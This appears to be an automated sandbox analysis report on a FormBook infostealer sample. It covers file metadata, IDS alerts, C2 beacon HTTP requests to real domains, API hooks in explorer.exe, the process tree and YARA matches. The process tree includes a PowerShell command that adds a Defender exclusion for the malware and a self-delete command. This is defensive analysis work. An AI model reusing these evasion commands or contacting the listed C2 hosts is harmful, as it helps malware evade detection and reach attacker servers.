                                .rsrc | 0x80000 | 0x4198 | 0x4200 | False | 0.244377367424 | data | 4.6611198492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x86000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_ICON | 0x80190 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                RT_ICON | 0x805f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4280185157, next used block 4280185157 | |
                                RT_ICON | 0x816a0 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4280185157, next used block 4280185157 | |
                                RT_GROUP_ICON | 0x83c48 | 0x30 | data | |
                                RT_VERSION | 0x83c78 | 0x334 | data | |
                                RT_MANIFEST | 0x83fac | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                Imports

                                DLL | Import
                                mscoree.dll | _CorExeMain

                                Version Infos

                                Description | Data
                                Translation | 0x0000 0x04b0
                                LegalCopyright | Delchamps 2015
                                Assembly Version | 7.3.0.0
                                InternalName | DebugVi.exe
                                FileVersion | 7.3.0.0
                                CompanyName | Delchamps
                                LegalTrademarks |
                                Comments |
                                ProductName | Platformer_AI
                                ProductVersion | 7.3.0.0
                                FileDescription | Platformer_AI
                                OriginalFilename | DebugVi.exe

                                Network Behavior

                                Snort IDS Alerts

                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                10/28/21-07:41:15.191108 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49783 | 34.102.136.180 | 192.168.2.5
                                10/28/21-07:41:56.621298 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 109.232.217.55
                                10/28/21-07:41:56.621298 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 109.232.217.55
                                10/28/21-07:41:56.621298 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49795 | 80 | 192.168.2.5 | 109.232.217.55

                                Network Port Distribution

                                TCP Packets


                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Oct 28, 2021 07:41:14.957154036 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
                                Oct 28, 2021 07:41:14.980756044 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
                                Oct 28, 2021 07:41:35.400157928 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
                                Oct 28, 2021 07:41:35.425120115 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
                                Oct 28, 2021 07:41:56.544334888 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
                                Oct 28, 2021 07:41:56.564491987 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Oct 28, 2021 07:41:14.957154036 CEST | 192.168.2.5 | 8.8.8.8 | 0xeba | Standard query (0) | www.lifeinformpodcast.com | A (IP address) | IN (0x0001)
                                Oct 28, 2021 07:41:35.400157928 CEST | 192.168.2.5 | 8.8.8.8 | 0x97dc | Standard query (0) | www.transforming-leadership.com | A (IP address) | IN (0x0001)
                                Oct 28, 2021 07:41:56.544334888 CEST | 192.168.2.5 | 8.8.8.8 | 0xf306 | Standard query (0) | www.diofis.com | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Oct 28, 2021 07:41:14.980756044 CEST | 8.8.8.8 | 192.168.2.5 | 0xeba | No error (0) | www.lifeinformpodcast.com | lifeinformpodcast.com | | CNAME (Canonical name) | IN (0x0001)
                                Oct 28, 2021 07:41:14.980756044 CEST | 8.8.8.8 | 192.168.2.5 | 0xeba | No error (0) | lifeinformpodcast.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                Oct 28, 2021 07:41:35.425120115 CEST | 8.8.8.8 | 192.168.2.5 | 0x97dc | No error (0) | www.transforming-leadership.com | | 159.65.10.143 | A (IP address) | IN (0x0001)
                                Oct 28, 2021 07:41:56.564491987 CEST | 8.8.8.8 | 192.168.2.5 | 0xf306 | No error (0) | www.diofis.com | diofis.com | | CNAME (Canonical name) | IN (0x0001)
                                Oct 28, 2021 07:41:56.564491987 CEST | 8.8.8.8 | 192.168.2.5 | 0xf306 | No error (0) | diofis.com | | 109.232.217.55 | A (IP address) | IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.lifeinformpodcast.com
                                • www.transforming-leadership.com
                                • www.diofis.com

                                HTTP Packets

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                0 | 192.168.2.5 | 49783 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Oct 28, 2021 07:41:15.005089998 CEST | 1470 | OUT | GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1
                                Host: www.lifeinformpodcast.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:15.191107988 CEST | 1471 | IN | HTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Thu, 28 Oct 2021 05:41:15 GMT
                                Content-Type: text/html
                                Content-Length: 275
                                ETag: "61797038-113"
                                Via: 1.1 google
                                Connection: close
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                1 | 192.168.2.5 | 49790 | 159.65.10.143 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Oct 28, 2021 07:41:35.714570045 CEST | 6796 | OUT | GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1
                                Host: www.transforming-leadership.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:36.150578976 CEST | 6797 | IN | HTTP/1.1 404 Not Found
                                Date: Thu, 28 Oct 2021 05:41:35 GMT
                                Server: Apache
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"
                                Referrer-Policy: no-referrer-when-downgrade
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: 97e3<!DOCTYPE html><html class="no-js" lang="en-AU"><head> <meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="http://www.transforming-leadership.com/xmlrpc.php"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v17.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Transforming Leadership</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Transforming Leadership" /><meta property="og:site_name" content="Transforming Leadership" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.transforming-leadership.com/#website","url":"https://www.transforming-leadership.com/","name":"Transforming Leadership","description":"","potentialActio


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                2 | 192.168.2.5 | 49795 | 109.232.217.55 | 80 | C:\Windows\explorer.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Oct 28, 2021 07:41:56.621298075 CEST | 6859 | OUT | GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1
                                Host: www.diofis.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Timestamp: Oct 28, 2021 07:41:56.921601057 CEST, kBytes transferred: 6860, Direction: IN, Data:
                                HTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.24
                                content-type: text/html; charset=UTF-8
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache: miss
                                content-length: 33607
                                date: Thu, 28 Oct 2021 05:41:56 GMT


                                Code Manipulations

                                User Modules

                                Hook Summary

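                                Function Name: PeekMessageA, Hook Type: INLINE, Active in Processes: explorer.exe
                                Function Name: PeekMessageW, Hook Type: INLINE, Active in Processes: explorer.exe
                                Function Name: GetMessageW, Hook Type: INLINE, Active in Processes: explorer.exe
                                Function Name: GetMessageA, Hook Type: INLINE, Active in Processes: explorer.exe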

                                Processes

                                Process: explorer.exe, Module: user32.dll
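                                Function Name: PeekMessageA, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
                                Function Name: PeekMessageW, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x86 0x6E 0xEA
                                Function Name: GetMessageW, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x86 0x6E 0xEA
                                Function Name: GetMessageA, Hook Type: INLINE, New Data: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA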

                                System Behavior

                                General

                                Start time:07:40:03
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x70000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:07:40:05
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x80000
                                File size:430592 bytes
                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:06
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\MAPO-PI.exe
                                Imagebase:0xeb0000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Start time:07:40:09
                                Start date:28/10/2021
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Start time:07:40:31
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmmon32.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                Imagebase:0x8b0000
                                File size:36864 bytes
                                MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                General

                                Start time:07:40:35
                                Start date:28/10/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del 'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:07:40:36
                                Start date:28/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                Code Analysis

                                  Executed Functions

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC10
                                  • GetCurrentThread.KERNEL32 ref: 0094BC4D
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC8A
                                  • GetCurrentThreadId.KERNEL32 ref: 0094BCE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID: h}o
                                  • API String ID: 2063062207-4263065848
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC10
                                  • GetCurrentThread.KERNEL32 ref: 0094BC4D
                                  • GetCurrentProcess.KERNEL32 ref: 0094BC8A
                                  • GetCurrentThreadId.KERNEL32 ref: 0094BCE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID: h}o
                                  • API String ID: 2063062207-4263065848
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00949AF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID: |Ok$|Ok
                                  • API String ID: 4139908857-2037569923
                                  • Opcode ID: 86ee55d20db908612c55b1477f23f829a52c6cda84b54f149f0650b50845347a
                                  • Instruction ID: fabd0f681fbb46bde5af786e63f1000bbb05c6d0c314c7ef5b8f794c936e641f
                                  • Opcode Fuzzy Hash: 86ee55d20db908612c55b1477f23f829a52c6cda84b54f149f0650b50845347a
                                  • Instruction Fuzzy Hash: 33712270A00B058FDB64DF6AD041B9BBBF5BF89314F008A2DE48AD7A50DB35E8458F91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009454A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: daa0508dfbbd223125f36ed4ac7e75c0529e221e84d6fadba48c29215537f89d
                                  • Instruction ID: 2e333e7fde0cb13a1b689a569d66c3ecec8ae3e208827ad44add6a5df9e30c05
                                  • Opcode Fuzzy Hash: daa0508dfbbd223125f36ed4ac7e75c0529e221e84d6fadba48c29215537f89d
                                  • Instruction Fuzzy Hash: B241F271C00719CBDB24CFA9C888BDEBBB5FF89308F248469D408AB251DB716946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 009454A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 888b727a2f0e59606bdc9b4921c6bf235f60fa653ddaea35b7391fe2e1777d0a
                                  • Instruction ID: 2c1c56541882b831536a1ba9c476cffc88d1072f1ad5f32f846a09f167d231e5
                                  • Opcode Fuzzy Hash: 888b727a2f0e59606bdc9b4921c6bf235f60fa653ddaea35b7391fe2e1777d0a
                                  • Instruction Fuzzy Hash: 1E41F571C04719CFDB24CFA9C884BDDBBB5BF89308F24846AD408AB251D7756946CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094BE5F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 979f771e4f6b63fadc5ff7e33ddd970e07873412d79a3a2ad9fde9fa4f5ec2f0
                                  • Instruction ID: e5f99caeac942aa8274c4b7406bcd21f371a76c9f381d64a823a9db47fa4fb74
                                  • Opcode Fuzzy Hash: 979f771e4f6b63fadc5ff7e33ddd970e07873412d79a3a2ad9fde9fa4f5ec2f0
                                  • Instruction Fuzzy Hash: 1E21F2B5900249AFCB10CFA9D984AEEBFF4EB48324F14841AE955A3350D374A954CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094BE5F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 2a6f5a850e090143212e22653a8b1777baf1f93f7a7e92d0cff88cef1da45d2d
                                  • Instruction ID: a5ff61a14d43457c4ee5429e12c7adfbdf5d3dd1786623c9d8d0388b084e0bca
                                  • Opcode Fuzzy Hash: 2a6f5a850e090143212e22653a8b1777baf1f93f7a7e92d0cff88cef1da45d2d
                                  • Instruction Fuzzy Hash: 6D21E2B5900209AFDB10CFA9D984ADEBBF8FB48324F14841AE914A3350D374A954CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00949B71,00000800,00000000,00000000), ref: 00949D82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: bd9af20cd79cf209260c16e10d73af98a86da64308feb36ddc5bc8c16ca4e12b
                                  • Instruction ID: dd677d018cafebcf9d901acb91f1740880f8b9e0bd987afc8e62a628ccbc7a5c
                                  • Opcode Fuzzy Hash: bd9af20cd79cf209260c16e10d73af98a86da64308feb36ddc5bc8c16ca4e12b
                                  • Instruction Fuzzy Hash: 0F11E4B6D003499FCB10DF9AD444ADEFBF8EF88324F14842AE519A7640C375A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00949B71,00000800,00000000,00000000), ref: 00949D82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: c32a36fc9a02ced100426b4b66dc00c498557e400fe55c5d978a963e97b741a8
                                  • Instruction ID: 0d4648a7710033e0167f761e00615cb4bcb40b0e895c6ab4dfcb42ac6bff0afd
                                  • Opcode Fuzzy Hash: c32a36fc9a02ced100426b4b66dc00c498557e400fe55c5d978a963e97b741a8
                                  • Instruction Fuzzy Hash: BD11F9B5D003498FCB10CF99D884ADEFBF4AF88314F14852EE455A7641C375A549CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00949AF6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237991355.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: afa8c81f22732d64a39571802155c7a9705e1a6cce1cb1879f2a4791b4ba759f
                                  • Instruction ID: a0ca450fd56df9728dca01f850ec4b6869e25d4dc9c07d3341b6287025ebad2c
                                  • Opcode Fuzzy Hash: afa8c81f22732d64a39571802155c7a9705e1a6cce1cb1879f2a4791b4ba759f
                                  • Instruction Fuzzy Hash: 6811DFB5D006498FCB10CF9AD444ADEFBF8EF89324F14852AD869B7600D375A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237688154.00000000006BD000.00000040.00000001.sdmp, Offset: 006BD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee159a45c980087e7a7f242d64df73776da2e549fe2fcc85f366d2ee03edc8ee
                                  • Instruction ID: 797d2768981b90f25da3736cb42559ce9b46430a04dfb22778bf73524232fa90
                                  • Opcode Fuzzy Hash: ee159a45c980087e7a7f242d64df73776da2e549fe2fcc85f366d2ee03edc8ee
                                  • Instruction Fuzzy Hash: 352107B5504240DFCB14EF54D9C4BA6BBA6FB88324F24C9A9D8094F386D336D887CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237688154.00000000006BD000.00000040.00000001.sdmp, Offset: 006BD000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f793949b337ae4ff9dcc3a442773f01242d265d866949f9d8e095959a8fc4bb1
                                  • Instruction ID: 735141eb918e2a44baf631902940f6d1daafae49bea341cb07a81dd353019a26
                                  • Opcode Fuzzy Hash: f793949b337ae4ff9dcc3a442773f01242d265d866949f9d8e095959a8fc4bb1
                                  • Instruction Fuzzy Hash: 99218E755093C08FCB02DF24D994B55BF72EB46314F28C5DAD8498F6A7C33A984ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.237479271.0000000000072000.00000002.00020000.sdmp, Offset: 00070000, based on PE: true
                                  • Associated: 00000000.00000002.237473886.0000000000070000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.237489008.000000000007F000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b1929371aab53472a3dbf485ba2cd3b7e192a744007e71e418c0859f1648afc
                                  • Instruction ID: 677f15a3550a38c36cd9dfead422c1af30a2e8f2f325db0862be591a8e2b5be6
                                  • Opcode Fuzzy Hash: 2b1929371aab53472a3dbf485ba2cd3b7e192a744007e71e418c0859f1648afc
